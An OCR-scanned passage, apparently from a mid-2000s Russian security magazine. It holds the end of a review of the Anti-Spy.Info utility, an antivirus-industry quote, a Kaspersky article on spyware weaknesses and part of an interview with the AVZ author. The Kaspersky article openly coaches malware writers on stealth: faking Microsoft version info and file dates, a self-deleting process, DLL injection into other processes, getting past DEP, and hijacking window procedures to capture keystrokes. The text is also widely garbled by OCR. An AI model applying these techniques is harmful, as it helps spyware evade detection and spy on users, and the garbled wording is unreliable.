жать на кнопку «Quarantine», выбрать объект для 
восстановления и сказать «Restore». A для окон- 
чательного удаления из карантина — «Delete». 

К своему стыду, всю информацию о состоя- 
нии карантина Anti-Spy.Info хранит в реестре. То 
есть, если поместить в карантин какой-нибудь 
жизненно важный системный компонент, без ко- 
торого Windows не загрузится, мы уже не сможем 
запустить Anti-Spy.Info, чтобы вернуть все обрат- 
но. Правильным решением было бы хранить ин- 
формацию в обыкновенном дисковом файле, тог- 
да, загрузившись с Windows PE, Ват РЕ или лю- 
бого другого Live CD, мы смогли бы запустить Anti- 
Зру.пЮ, указать ей на карантинный файл и произ- 
вести откат, а так... карантин превращается в раз- 
рушительное оружие, которое можно доверить 
только умелым рукам морских пехотинцев. 

Другой уникальной особенностью Апй-Зру.!п- 
fo является умение отслеживать компоненты, за- 
гружающиеся вместе с IE, которые непосредствен- 
но не отображаются в Диспетчере Задач, а многие 
черви распространяются именно так! Всем нестан- 
дартным !Е-компонентам Anti-Spy.Info присваивает 
довольно высокий уровень опасности (порядка 
70%), даже если они хорошо известны: Fresh 
Download Catcher Module, ReGetApi Module, Adobe 
Acrobat IE Helper Version X for ActiveX и т.д. Очень 
приятно, что модули можно отключать, так как сам 


IE этого не позволяет. И хотя, начиная с 5-й версии, 
появилась возможность отключить все нештатные 
модули целиком, это проблемы не решает. 

Вполне типичная ситуация: после установки 
менеджера закачек Fresh Download под 4-м IE все 
работало нормально, вплоть до перехода на 5-ую 
версию, которая сразу же начала падать при запу- 
ске без вопросов и объяснений. При отключении 
всех модулей падения прекращались, но зачем IE 
без модулей? Возвращаем модули обратно, берем 
в лапы Anti-Spy.Info и методом поочередного отклю- 
чения за несколько минут находим, кто виноват. 
> — диагноз. Anti-Spy.Info — прекрасная утилита, 
позволяющая быстро находить зловредные (или 
некорректно работающие) программы, с возмож- 
ностью временного или полноценного удаления их 
из системы. Конечно, в отличии от антивирусов, 
работающих в полностью автоматическом режи- 
ме, она требует от пользователя достаточно высо- 
кой квалификации и потому не может быть реко- 
мендована, например, секретарше. 

К тому же, она не заменяет, а дополняет ан- 
тивирусы, поскольку следит лишь за активными 
(то есть уже запущенными) программами, но ни- 
чего не может сказать о файле, только что полу- 
ченном из Сети. Еще она не способна обнаружи- 
вать скрытые файлы и процессы, маскирующиеся 
на уровне ядра операционной системы, то есть го- 
otkit'bl, число которых неуклонно растет. 

Но и не стоит требовать от маленькой утилиты 
решения всех своих задач. К защите необходимо 
подходить комплексно, используя широкий спектр 
инструментов. И Anti-Spy.Info — в том числе © 
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AVP не смог распознать новую модификацию Trojan-Downloader.Win32.Bagle 
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диагноз 


ТО, ЧТО СЕЙЧАС ПРОИСХОДИТ 

НА РЫНКЕ, ПО СЛОВАМ ИГОРЯ 
ДАНИЛОВА, ВООБЩЕ НЕ ПОДДАЕТСЯ 
НИКАКОМУ ОПИСАНИЮ. 


«ЗДЕСЬ СЕГОДНЯ ПРИСУТСТВУЮТ 
ПРОГРАММНЫЕ ПРОДУКТЫ, КОТОРЫЕ 
ПРОСТО ТЕХНОЛОГИЧЕСКИ НЕ МОГУТ 
НАХОДИТЬСЯ В СТАНЕ АНТИВИРУСОВ, 
ПОТОМУ ЧТО ПО СВОЕМУ УРОВНЮ, 
ЕСЛИ ГОВОРИТЬ УТРИРОВАННО, ЭТО 
ПРОДУКЦИЯ ХОРОШЕГО УЧЕНИКА 
11-ГО КЛАССА. ПРИЧЕМ ВСЕ ОНИ 
НАЗЫВАЮТ СЕБЯ ЛИДЕРАМИ. ПОРОГ 
ВСТУПЛЕНИЯ В АНТИВИРУСНЫЙ КЛУБ 
СИЛЬНО СНИЗИЛСЯ, И НА ПЕРВЫЙ ПЛАН 
ВЫШЛИ БОРЦЫ С ПРИМИТИВНЫМИ 
СКРИПТОВЫМИ ВИРУСАМИ. 


ПОЛЬЗОВАТЕЛЬ ПРИВЫК К ПОСТОЯННЫМ 
СТРАШИЛКАМ: ВЕЗДЕ ВИРУСЫ, 
ОПАСНОСТЬ, ВСЕ ПРОСТО КИШИТ 
ТРОЯНЦАМИ, ЧЕРВЯМИ, КОТОРЫЕ 

ТАК И НОРОВЯТ УКРАСТЬ У ТЕБЯ 
ЧТО-НИБУДЬ. ПОДОБНАЯ АТМОСФЕРА 
СОЗДАЕТСЯ, ПРЕЖДЕ ВСЕГО, 
НЕКОТОРЫМИ ВЕНДОРАМИ. ПОХОЖЕ 

НА СИТУАЦИЮ С ПТИЧЬИМ ГРИППОМ: 
ГРЯДЕТ ЭПИДЕМИЯ, ВСЕ — УМРЕМ. 
СТРАШНО. КТО-ТО БЬЕТ ТРЕВОГУ, 

А КТО-ТО СЧИТАЕТ, ЧТО УЖАСА НЕТ. 
ЭТО ЖЕ ОЧЕНЬ ВЫГОДНО — ПОСТОЯННО 
ДЕРЖАТЬ В СТРАХЕ ПОЛЬЗОВАТЕЛЯ 

И ВНУШАТЬ ЕМУ, ЧТО ТОЛЬКО ТВОЕ 
РЕШЕНИЕ ЗАЩИТИТ ОТ ВСЕХ БЕД. 
ЧЕЛОВЕК СРАЗУ ПОКУПАЕТ АНТИВИРУС, 
И СУЩЕСТВУЕТ ВЕРОЯТНОСТЬ, ЧТО ОН 
ДАЖЕ НИКОГДА НЕ ПОЛУЧИТ ВИРУС, 

А СООТВЕТСТВЕННО, НЕ УЗНАЕТ, КАК 
РАБОТАЕТ ПРИОБРЕТЕННЫЙ ПРОДУКТ... 
ПРИ ЭТОМ СИСТЕМА МИФОВ И СЛУХОВ 
РАБОТАЕТ БЕЗОТКАЗНО. КТО-ТО 
СКАЗАЛ, ЧТО ТАКОЙ-ТО АНТИВИРУС 
«ЛОВИТ НЕ ВСЕ». И ПОШЛО-ПОЕХАЛО. 

И ЭТО ПОНЯТНО. 


НАПРИМЕР, Я ВЫБИРАЮ ДВЕРНОЙ 
ЗАМОК. КУПИЛ САМЫЙ ДОРОГОЙ, 
САМЫЙ ТЯЖЕЛЫЙ, ВООБЩЕ САМЫЙ- 
САМЫЙ. А ПОТОМ УВИДЕЛ ПО ТУ, ЧТО 
ОН ЭЛЕМЕНТАРНО ВСКРЫВАЕТСЯ 
ШПИЛЬКОЙ ЗА 10 МИНУТ. А ЗНАЧИТ, ОН 
НИЧЕМ НЕ ЛУЧШЕ ЗАМКА ЗА 100 РУБЛЕЙ. 
ТАК ЧТО ГЛАВНЫЙ КРИТЕРИЙ ТОЛЬКО 
ОДИН — КАЧЕСТВО. НО ЕГО, К 
СОЖАЛЕНИЮ, МОЖНО ПРОВЕРИТЬ 
ТОЛЬКО НА СОБСТВЕННОМ ОПЫТЕ». 


company.drweb,com/press/igor+daniloff+cnews+ 
interview+may+2006 — полный текст интервью 
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Малварью здесь и далее будем называть все вре- 
доносное программное обеспечение, занимаю- 
щееся размножением, шпионажем, рассылкой 
рекламы и другими вещами, протекающими без 
ведома и согласия владельца в недрах его ком- 
пьютера. Достигнув пика своего технологическо- 
го развития в середине девяностых (когда хакеры 
додумались до stealth-BupycosB и полиморфизма), 
в наши дни малварь предалась пошлому развра- 
ту и пришла в упадок. В основном пишется начи- 
нающими программистами (пренебрежительно 
называемыми «пионерами»), торчащими на язы- 
ках высокого уровня типа DELPHI или Visual Ва- 
sic'a. Как следствие — качество малвари упало 
ниже плинтуса, и основная масса штаммов дох- 
нет еще на самом излете. 


умри, но сейчас 


ОСНОВНЫЕ УЯЗВИМЫЕ МЕСТА РЯДОВОГО SPYWARE 


ПОДАВЛЯЮЩЕЕ БОЛЬШИНСТВО ЧЕРВЕЙ/ВИРУСОВЛИПИОНОВ РОЖДАЮТСЯ БЕСПОМОЩНЫМИ 
И АБСОЛЮТНО НЕЖИЗНЕСПОСОБНЫМИ. ВЫЗЫВАТЬ КРУПНЫЕ ЭПИДЕМИИ УДАЕТСЯ ДАЛЕКО НЕ 


ВСЕМ. ПОЧЕМУ? ПОПРОБУЕМ РАЗОБРАТЬСЯ 


Крис Касперски aka Мыщъх 
по е-тай 


Проблема отнюдь не в самом DELPHI или Visual 
Basic'e — это вполне достойные инструменты. Про- 
блема в том, что пионеры не умеют ими пользо- 
ваться, дружно наступая на один и Te же грабли. 

>  непротестированный код. Редкая программа 
пишется без ошибок, и начинает работать с пол- 
пинка, тем более, если речь идет о таких слож- 
ных механизмах, как вирусы, черви, шпионы, по 
сути являющихся высоко-автономными робота- 
ми, вроде тех аппаратов, что летают на Венеру, 
Юпитер или Марс. Однажды выпущенная в Сеть 
зараза становится полностью предоставленной 


самой себе, и допущенные в ней ошибки испра- 
вить уже не удастся. 

А значит, тестировать, тестировать и еще 
раз тестировать. Так ведь нет... Если малварь за- 
пускается и не падает — это уже хорошо! Древних 
(ныне ископаемых) программистов еще можно 
как-то понять, у них был только IBM РС в количе- 
стве одна штука и «косые» флопы в качестве ре- 
зервных носителей. Но даже в таких условиях 
создавались легендарные вирусы типа OneHalf. 
Сейчас же любой может при помощи VM Ware 
установить несколько версий операционных си- 


стем (98, W2K, XP, Server 2003) и связать их вир- 
туальной сетью. Лучшего полигона для отладки 
малвари, пожалуй, и не придумать. 

Среднестатистический пользователь обыч- 
но замечает малварь лишь тогда, когда его люби- 
мый компьютер начинает вести себя не так, как 
обычно: некоторые приложения не запускаются, 
те же, что запускаются — работают ужастно мед- 
ленно, на экран часто выпрыгивают сообщения о 
критических ошибках, вплоть до полного выпаде- 
ния в голубой экран смерти. Вот тут-то жертва и 
начинает лихорадочно устанавливать различные 
антивирусы, брандмауэры и прочие сторожевые 
программы, призванные «найти-и-уничтожить». 
А если ничего не помогает, то пользователь про- 
сто форматирует винт и полностью переустана- 
вливает операционную систему. 

Чем корректнее ведет себя малварь, тем 
больше у него шансов остаться незамеченным. 
А для этого программа должна быть тщательно 
протестирована, причем на разных процессорах! 
То, что мгновенно выполняется на мощных процес- 
copax типа Pentium-4, зачастую вызывает 100% 3a- 
грузку простеньких Pentium-ll/Ill, с существованием 
которых так же приходится считаться. 
> излишняя сложность. Чем сложнее меха- 
низм, тем больше времени он требует для своего 
создания и отладки, а конец у всех один. Как 
только малварь замечают — ее тут же заносят в 
антивирусную базу и злорадно прибивают. Над 
этим целая индустрия работает, вербующая от- 
нюдь не глупых людей. Известны случаи (и их до- 
статочно много), когда вирус, разрабатываемый 
годами (!), палился антивирусной процедурой, 
созданной меньше, чем за день. 

Технология отлова полиморфиков уже дав- 
но отработана. Продвинутые антивирусы (AVP, 
Dr.WEB) пропускают проверяемый код через эму- 
лятор и гонят его на графы, приводя к тому или 
иному метаязыку, отражающему суть программы, 
но не способ ее достижения. Поэтому даже самые 
крутые полиморфики гаснут как бычки в писсуа- 
ре, ведь изменить заложенный в них алгоритм 
они не в силах. 

Интеллектуально не отягощенные игроки ан- 
тивирусного рынка просто размножают полимор- 
фик в огромном количестве экземпляров (от 10 
тысяч и более), удаляют все повторы, а оставшие- 
ся заносят в базу (вот почему для ловли многих 
вирусов Norton'y подчас требуется сотни записей). 
Уже никто не анализирует малварь и не потрошит 
ее дизассемблером, ну, разве что самые популяр- 
ные экземпляры. А для подавляющего большин- 
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Обычно у малвари нет вкладки «версия» (не заполнен раздел VersionIinfo) 


ства остальных антивирусные энциклопедии дают 
крайне невнятные описания. Загляни для сравне- 
ния в энциклопедии десяти-пятнадцатилетней 
давности. Какие там были описания! По несколько 
страниц, с фрагментами дизассемблерных ли- 
стингов — красота! 

Но стоит ли уподобляться Microsoft, стре- 
миться к крутости ради крутизны и усложнять мал- 
варь без нужны? Зачем разрабатывать наворо- 
ченные механизмы, когда и простые неплохо ра- 
ботают. Правило самолета (airplane rule) гласит, 
что «сложность увеличивает вероятность полом- 
ки: двухмоторный самолет по сравнению с одно- 
моторным имеет, по крайней мере, вдвое больше 
проблем с двигателями». 

ПРОСТОЙ ПРИМЕР. СРАВНЕНИЕ АР! ОПЕРАЦИОН- 
НЫХ СИСТЕМ WINDOWS И UNIX. СЛОЖНУЮ СИСТЕМУ 
МОЖЕТ ПРИДУМАТЬ КАЖДЫЙ ДУРАК, НО ТОЛЬКО ГЕНИЙ 
СУМЕЕТ УЛОЖИТЬ ВЕСЬ НЕОБХОДИМЫЙ ФУНКЦИО- 
НАЛ В МИНИМУМ СТРОК КОДА, РЕАЛИЗОВАТЬ И ОТЛА- 
ДИТЬ КОТОРЫЕ УЖЕ НЕ СОСТАВИТ БОЛЬШОГО ТРУДА. 
> = хвост и усы — вот мои документы. По непо- 
нятной, можно даже сказать, мистической причи- 
не подавляющее большинство малваре-писате- 
лей не заполняют секцию ресурсов, описываю- 


ТОНКИЙ МОМЕНТ — ИКОНКА. ГОЛЫЙ ИСПОЛНЯЕМЫЙ ФАЙЛ, 
ИЗОБРАЖАЮЩИЙ ИЗ СЕБЯ «СТАНДАРТНОЕ ПРИЛОЖЕНИЕ WINDOWS», 
ПРИВЛЕКАЕТ К СЕБЕ НАМНОГО БОЛЬШЕ ВНИМАНИЯ ЧЕМ... МОРКОВКА. 


щую свойства файла, что отображается «провод- 
ником» в одноименной вкладке. Нормальные ком- 
мерческие программы так себя не ведут (для них 
это большая редкость), поэтому малварь тут же 
палит себя. Вряд ли продвинутый пользователь 
согласится запускать файл «без документов». 
Если же малварь внедряется обходным путем, на- 
пример, через дыру в Windows или подпущенную к 
компьютеру женщину (а женщины имеют тенден- 
цию запускать все без разбора), то утилиты типа 
Anti-Spy.Info тут же внесут такие файлы в список 
подозреваемых. 

Заполнять «бланк» свойств лучше не абы 
как, а по образу и подобию Microsoft. Ее же и ста- 
вить в качестве компании-разработчика :). Ис- 
пользовать вымышленные компании крайне не- 
желательно, поскольку беглый поиск доодГом тут 
же разоблачает обман. Прикрываться брендами 
типа ATI тоже рискованно. Вдруг человек предпо- 
читает Matrox — вот он будет недоумевать, откуда 
у него взялась эта гадость на его компьютере :). 
A файлы от Microsoft ectb у всех, и никто не может 
сказать, сколько их, и зачем они нужны. 

Другой тонкий момент — иконка. Голый ис- 
полняемый файл, изображающий из себя «стан- 
дартное приложение Windows», привлекает к се- 
бе намного больше внимания чем... морковка. 
Или редиска! Да что угодно, только лучше не из 
стандартного набора значков, входящих в состав 
Microsoft Visual Studio — опытным пользователем 
они хорошо известны. Надежнее взять что-то CO- 
вершенно неожиданное, тут все от воображения 
и фантазии зависит. 
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> дата создания файла. Штатным образом 
Windows поддерживает три даты, связанные с 
каждым файлом — дата создания, дата модифи- 
кации (доставшаяся ей в наследство от MS-DOS) и 
дата последнего доступа. При создании файла на 
диске ему автоматически присваивается текущая 
дата создания, что позволяет легко изобличить 
непрошеную заразу. Просто заходишь в каталог 
WINNT\System32 своим любимым FAR'oM, жмешь 
<CTRL-F8> и файлы, созданные последними, ока- 
зываются наверху... 

Умная малварь поступает так. Она считыва- 
ет время создания KERNEL32.DLL (или любого 
другого системного файла Windows) и вызывает 
стандартную и притом документированную API- 
функцию SetFileTime, чтобы хоть как-то замаски- 
роваться. 


прототип функции SetFileTime, позволяющий 
легальным образом манипулировать с датой 
создания файла 


Но тут есть один нюанс. Настолько тонкий, что поч- 
ти незаметный. На МТЕ$-разделах с каждым фай- 
лом ассоциирован ряд скрытых атрибутов, недо- 
ступных стандартным функциям API uv среди про- 
чей полезной информации хранящих дату созда- 
ния данной файловой записи, совпадающей по 
времени с датой создания самого файла. Расхож- 
дение в датах указывает на факт подделки, не 
свойственный честным программам и разоблача- 
rol «умную малварь». 

Если и быть умным, то до конца! Изменив пе- 
ред созданием файла системное время, а затем 
возвратив его обратно, малварь обеспечит себе 
наивысшую скрытность и прочно оккупирует ком- 
пьютер, не опасаясь быть замеченной. 
> = недокументированные возможности. Исполь- 
зование недокументированных возможностей 
оправдано тогда и только тогда, когда без них 
обойтись невозможно или же создатель малвари 
на 100% уверен, что на всех целевых операцион- 
ных системах эти возможности реализованы оди- 
наково, что вовсе не факт. Даже установка очеред- 
ного пакета обновления приводит к значительным 
изменениям в поведении ОСи. 

Вот только один пример. При запуске ехе- 
файла доступ к нему блокируется и, если он вдруг 
захочет себя удалить, без посторонней помощи ему 
это ни за что не сделать, поскольку удаление стано- 
вится возможным только после снятия блокировки, 


то есть после завершения процесса. Конечно, мож- 
но создать ра{-файл, но только это некрасиво (хоть 
инадежно). А можно воспользоваться недокументи- 
рованной особенностью Windows 9x/NT, позволяю- 
щей освобождать страничный образ файла, тем са- 
мым снимая с него блокировку. В 9x это делается 
функцией FreeLibrary, в МТ и W2k — UnmapViewOf- 
File. Правда, выполнение кода в освобожденной 
секции становится невозможным, и любая попытка 
обращения к принадлежащей ей памяти возбужда- 
ет исключение. А нам еще DeleteFile и ExitProcess 
выполнить надо. Как быть? Приходится, разрывая 
себе задницу пополам, «заряжать» стек. 


код, удаляющий текущий процесс 


Проще раскрутить головоломку с конца. Очевид- 
но, что ге{ передает управление по адресу, кото- 
рый был занесен в стек перед ним, то есть вызыва- 
ет функцию fnFreeOrUnmap, которой, в зависимо- 
сти от версии Windows, оказывается либо FreeLi- 
brary, либо UnmapViewOfFile. Получив управление, 
ункция смотрит на стек и думает: ara, «DeleteFi- 
le» — это адрес возврата, а вот «module» — это 
мой аргумент. Освободив страничный образ, она 


з 


передает управление по адресу возврата (на месте 
которого лежит адрес DeleteFile) и увеличивает 
значение указателя стека на 4 (размер передан- 
ных ей аргументов). 

Получив управление, DeleteFile смотрит на 
стек и думает: ara, «ExitProcess» — это адрес воз- 
врата, а вот «push eax» — мой аргумент с именем 
файла, который нужно удалить! И ведь удаляет, 
как ни странно, поскольку модуль к этому времени 
уже освобожден. 

Следующей (и последней) управление полу- 
чает функция ExitProcess, завершающая выпол- 
нение программы, которой уже нет. 

Элегантно! Никаких тебе временных bat- 
файлов и прочей дисковой активности (которую, 
кстати, могут заметить всякие недружелюбно на- 
строенные мониторы). Но разве кто-нибудь гаран- 
тировал (документация или лично Билл Гейтс), что 
UnmapViewOfFile позволяет освобождать образ 
ехе-файла? На МТ и W2K это работало лишь пото- 
му, что ядро хранило ссылку на обработчик объек- 
та-секции (не путать с секциями РЕ-файла) и Un- 
mapViewOfFile послушно его освобождало. Начи- 
ная с ХР, ядро обращается к обработчику секции 
через указатель, обламывая вызов UnmapViewOf- 
File, a вместе с ним весь кайф. 

Отсюда вывод — решение, построенное на 
недокументированных возможностях, может рух- 
нуть в любой момент. Поэтому, используя его, 
необходимо как минимум предусмотреть обход- 
ной путь на тот случай, если оно не сработает. 
> — незаконнорожденные потоки. Чтобы не по- 
рождать отдельный процесс, некоторая малварь 
внедряется в один из уже существующих, порож- 
дая в нем свой поток, причем делает это настоль- 
ко неумело, что сразу же обращает на себя внима- 
ние и легко обнаруживается утилитой «Process 
Explorer» Марка Руссиновича или любым отладчи- 
ком (OlyDbg, зоН-се). А все потому, что память, в 
которой малварь размещает свой код, в 99% слу- 
чаях выделяется через VirtualAlloc/VirtualAllocEx, 
то есть берется из динамической памяти, в то вре- 
мя как нормальные потоки вращаются в пределах 
образов исполняемых файлов или DLL. 

Чтобы хоть как-то замаскировать торчащий 
из норы хвост, малварь должна поместить свое те- 
ло в DLL, закинуть его в системный каталог Win- 
dows (или куда-нибудь в другой место) и загрузить 
внутрь атакуемого процесса через LoadLibrary. 
Естественно, делать это следует из контекста ата- 
куемого процесса, поскольку ни сама LoadLibrary, 
ни ее расширенная версия LoadLibraryEx не при- 
нимают обработчик процесса в качестве одного из 
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Голубой экран смерти, вызванный некорректно спроектированной малварью 


своих аргументов. TO есть, прежде чем загружать 
DLL, в процесс необходимо как-то внедриться. 
Проще всего это сделать через уже упомянутую 
VirtualAllocEx. Выделить блок в атакуемом процес- 
се, скопировать туда код загрузчика и вызвать 
CreateRemoteThread, либо скорректировать кон- 
текст активного потока, передав загрузчику упра- 
вление путем вызова функции GetThreadContext и 
коррекции регистра ЕР. 

Получив управление, загрузчик должен вы- 
звать LoadLibrary для загрузки своей DLL, вызвать 
CreateThread, указав в качестве стартового адре- 
са одну из функции динамической библиотеки, по- 
сле чего «замести следы» — освободить блок па- 
MATH, выделенный VirtualAllocEx, завершить по- 
ток, порожденный CreateRemoteThread (или Bep- 
нуть ЕР на место). Поскольку после освобожде- 
ния региона памяти исполнение оставшегося в 
нем кода становится невозможным, мы не сможем 
вызвать TerminateThread, He схлопотав исключе- 
ние, если только... не воспользоваться приемом 
из кода, удаляющего текущий процесс (смотри ли- 
стинги). На этот раз он не использует никаких не- 
документированных возможностей и полностью 
законен, сохраняя работоспособность даже на ма- 
шинах с включенным механизмом DEP, препят- 
ствующим выполнению кода в стеке. Однако ни- 
какого кода в стеке у нас нет! Одни лишь адреса 
возврата вместе с аргументами вызываемых 
функций. Правда, на 64-битных версиях Windows 
это уже не сработает, поскольку там АР!-функции 
принимают аргументы через регистры и стек от- 
дыхает (разумеется, сказанное относится только к 
64-битным приложениям, старые 32-битные при- 
ложения будут работать, как обычно). 

Кстати, о DEP. Выделяя блок памяти с по- 
мощью VirtualAllocEx, присвой ему атрибуты РА- 
GE_READWRITE, а перед передачей управления 
смени на РАСЕ_ЕХЕСОТЕ через VirtualProtectEx. 
На машинах без DEP атрибуты PAGE_READ и 
РАСЕ_ЕХЕСОТЕ взаимно эквивалентны, по- 
скольку процессоры старого поколения поддер- 
живали только два атрибута страниц: ACCESS 
(страница доступна для чтения/исполнения или 
недоступна) и write (страница доступна/недоступ- 
на для записи). Атрибут ЕХЕСОТЕ был прерога- 
тивой таблиц селекторов, то есть сегментов. Во 
времена разработки 80386 никому и в голову не 
могло прийти, что массовая операционная систе- 
ма сведет все три сегмента (кода, стека и дан- 
ных) в линейную память общего адресного про- 
странства. Фактически, атрибут PAGE_EXECUTE 
был высосан разработчиками win32 из пальца и 
не соответствовал реальному положению вещей, 
но сейчас все изменилось. И хотя по умолчанию 
DEP включен только для системных процессов 
(да и то не для всех), привыкать к атрибуту РА- 
СЕ_ЕХЕСОТЕ следует уже сейчас. А почему мы 
не установили сразу все три атрибута на страни- 
цу PAGE_EXECUTE_READWRITE? Ведь Virtual- 
ProtectEx это позволяет, да и процессор не про- 
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Червь msbiast, забывающий скорректировать дату создания файла, чем и выдающий себя с головой 


тив. Сейчас — да, никто не против и не возража- 
ет, но в Microsoft уже вынашивает планы по со- 
вершенствованию защиты своей оси, и попытка 
присвоения всех трех атрибутов будет либо вы- 
зывать исключение, либо требовать специаль- 
ных привилегий. 

И все равно, создание дополнительного 
протока — слишком заметно. Может ли малварь 
без него обойтись? Может! И для этого существу- 
ет множество путей. Не все из них ведут в рай, но 
все-таки. Самое простое — внедрившись в атаку- 
емый процесс через VirtualAllocEx и загрузив 
свою DLL, установить таймер, воспользовавшись 
АР!-функцией SetTimer, и периодически получать 
таймерные сообщения, обрабатывая их в контек- 
сте основного потока (точнее того потока, с кото- 
рым ассоциирован фокус ввода). Но это уже тех- 
нические детали, в которые можно не вдаваться. 
Главное, что новый поток не создается. Правда, 
остается таймер... 

Хитрая малварь действует очень скрытно. 
Получив дескриптор главного окна программы, 
она вызывает АР!-функцию GetWindowLong с па- 
раметром GWL_WNDPROC, получая адрес окон- 
ной процедуры (где происходит обработка сооб- 
щений) и тут же меняет его на свой через SetWin- 
dowLong. Этим она не только перехватывает все 
сообщения (в том числе передвижения мыши и 


«Да пусть хоть миллион вирусов ползает по компью- 
теру, лишь бы любимые игрушки работали нормаль- 
HO» — лозунг большинства пользователей 


нажатия клавиш, что очень полезно для шпион- 
ской деятельности), но и гарантированно обеспе- 
чивает себя процессорным временем, не созда- 
вая ни таймеров, ни новых потоков. Правда, пыт- 
ливый исследователь, вооруженный Soft-ice, мо- 
жет забеспокоиться: с чего бы это главное окно 
обрабатывается какой-то там посторонней DLL? 
Однако, при компонентом подходе к программи- 
рованию такие случаи достаточно часто встреча- 
ются и в легальных программах, особенно если 
они написаны на DELPHI. 

А вотеще один путь. Асинхронные сокеты — 
практически неиспользуемые, но очень мощные. 
Главное их достоинство в том, что, ожидая под- 
ключения клиента или передавая/принимая дан- 
ные по Сети, сокет немедленно возвращает упра- 
вление, сигнализируя о завершении процесса 
приема/передачи через специальный CALLBACK. 
В практическом плане это означает, что малварь 
может установить асинхронный сокет и тут же 
возвратить основному потоку управление, будучи 
при этом абсолютно уверенной, что в нужный мо- 
мент операционная система вспомнит о ней и пе- 
редаст управление САН-ВАСК-процедуре, pacno- 
ложенной внутри загруженной малварью динами- 
ческой библиотеки. Внешне все выглядит чики- 
чики — никаких тебе дополнительных потоков, 
никаких перехватов чего бы то ни было, вообще 
ничего подозрительного. 
> приговор. Список перечисленных слабых 
мест, конечно же, не является исчерпывающим. 
Ошибок в продуктах творчества пионеров очень 
много и все они тупы и до неприличия однооб- 
разны. Хорошая малварь все еще встречается, 
но редко. И с каждым годом все реже и реже. Ди- 
зассемблировать нечего. Ковыряться в мегабай- 
тах неаппетитного кода — неинтересно. В об- 
щем, скука смертная и никакого позитивного 
продвижения вперед © 
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Как нам всем известно с детства, существуют раз- 
ные тяжелые мужские профессии. Вот, например, 
сверловщик алмазных волок, выливщик-заливщик 
металла, занятый на производстве магния, массо- 
вик-затейник противотуберкулезного диспансера, 
скрубберщик-насосчик, в конце концов. 

Но есть в мире и еще более суровая профес- 
сия — профессия борца со злом. С компьютерным 
злом борются целые коммерческие армии кресто- 
носцев из Симантека, лаборатории Касперского и 
Диалог-Науки, с ними воюет даже могучий китай- 
ский медведь Панда. Но не перевелись на Руси и 
отдельные рыцари, которые выпускают свои ути- 
литы и которые, как ни странно, оказываются кон- 
курентоспособными и известными в компьютер- 
ном сообществе. Вот, например, антируткит-ан- 
тиспайвар от Олега Зайцева (AVZ). Этот програм- 
мный продукт уважает даже Николай «Горлум» 


Андреев (раньше трудился в нашем журнале, те- 
перь — в «Хакере», в общем, темный персонаж), 
аяне могу так сходу сказать, что или кого OH еще 
уважает, кроме Криса Касперски :). Кстати говоря, 
Олег Зайцев периодически писал статьи в наш 
журнал — в этом номере ты тоже можешь про- 
честь несколько его трудов, а мы сейчас зададим 
ему пару-другую вопросов. 


ПРИВЕТСТВУЮ, ОЛЕГ! НАСЛЫШАН 
ПРО ТВОЙ АНТИСПАЙВАР- 
АНТИРУТКИТ. И ВСЕ ЖЕ, РАССКАЖИ 
НАМ, ЧЕМ ОН ПРИНЦИПИАЛЬНО 
ОТЛИЧАЕТСЯ ОТ КОНКУРЕНТОВ 

В ЛИЦЕ ADAWARE, SPYBOT’A? 


ОЛЕГ ЗАЙЦЕВ: Если честно, я иногда не очень 
понимаю, чем заполнена база того же ADAware. 
Мусора там ... Жуть! Кукисы, реестры и прочее бе- 
зобразие. Поэтому я делал антиспайвер, который 
охотится исключительно на реальных «зверей», 
причем с бортовым антируткитом. Это важно — 
сейчас каждый десятый спайвер снабжен руткит- 
защитой (обычно простой, но тем не менее). Плюс 
в А\/7 встроен простейший антикейлоггер, лечил- 
ка LSP, всякие эвристические проверки системы. 
А главное — А\/7 работает без инсталляции, что 
позволяет его применять для оперативной чистки 
и проверки ПК. Еще поддерживаются внешние 
скрипты — они позволяют полностью автоматизи- 
ровать работу AVZ, что дает возможность админу 
включить его в автозапуск на ПК юзеров и затем 
только анализировать логи. Но всеже AVZ — боль- 
ше инструмент для анализа, чем антиспайвер с 
единственной кнопкой «Мочить всех шпионов». 


ADAWARE — ВООБЩЕ, ЛЮБИТЕЛЬ 
УБИВАТЬ СТРАШНЫЕ УГРОЗЫ 
«СРЕДНЕЙ ТЯЖЕСТИ» ТИПА 
TRACKING COOKIES. ЭТО, 
НАВЕРНОЕ, ДАЖЕ СТРАШНЕЕ, 
ЧЕМ СТРАШНЫЙ ВИРУС «МОТ-А- 
VIRUS-MIRC-6.12» :). МНЕ ВОТ 
ВСЕГДА БЫЛО ИНТЕРЕСНА ТАКАЯ 
ФИЧА, КАК БАЗА БЕЗОПАСНЫХ 
ОБЪЕКТОВ, ЧТОБЫ ЮЗЕРОВ НЕ 
ВВОДИЛ В ЗАБЛУЖДЕНИЕ SUPER_ 
SYSTEM_MIRROSOFT_32.EXE, 
ВИСЯЩИЙ В ПАМЯТИ. КАК ТЫ HE 
ПЕРЕНАПРЯГСЯ, СОЗДАВАЯ ЕЕ? 
ЭТО ЖЕ ТЫСЯЧИ ОБЪЕКТОВ? 


ОЛЕГ ЗАЙЦЕВ: База безопасных файлов — моя 
гордость. Во-первых, она отсекает ложняки, если 
они вдруг возникают, так что «чистый» файл вне 
подозрения. Во-вторых, резко сокращает размер 
протокола исследования системы и упрощается 
сам анализ. А создать ее было действительно 
трудно: набить базу кучей файлов из всяких ди- 
стрибутивов не составляет труда, а вот отобрать 
наиболее распространенные файлы — гораздо 


сложнее. Плюс анализ чистого файла иной раз 
сложнее, чем «зверя»... Сильно помогает форум 
virusinfo.info — там организован специальный сер- 
вис для присылки объектов, которые AVZ He де- 
тектит как чистые. С его помощью и идет основное 
пополнение баз. Кроме того, со мной сотруднича- 
ет ряд компьютерных фирм — они после начинки 
продаваемого ПК собирают неопознанные файлы 
и присылают мне. Ну и сам AVZ помогает: напри- 
мер, его антикейлоггер реагирует на все левые 
DLL, что приводит к их присылке на анализ и по- 
полнению базы. 


РАССКАЖИ КАКОЙ-НИБУДЬ СЕКРЕТ 
О СВОЕЙ ПРОГРАММЕ, ЧТО-НИБУДЬ, 
О ЧЕМ МЫ НЕ ПРОЧТЕМ В ИНТЕРНЕТЕ. 
МОЖЕТ БЫТЬ, ТЫ ЗАПРЯТАЛ ТАМ 
EASTER EGG, КАКОЙ-НИБУДЬ БЭКДОР 
ИЛИ ЕЩЕ ЧТО-ТО? СЕКРЕТНЫЕ 
ОПЦИИ, СКРЫТЫЕ В МЕНЮ? 


ОЛЕГ ЗАЙЦЕВ: Ну бэкдора там, конечно, нет, а 
вот скрытых опций — периодически бывает нава- 
лом... Обычно все происходит таким образом: по- 
является некая новая фича, првда, в меню ее нет, 
зато есть некий ключик для ее включения или ко- 
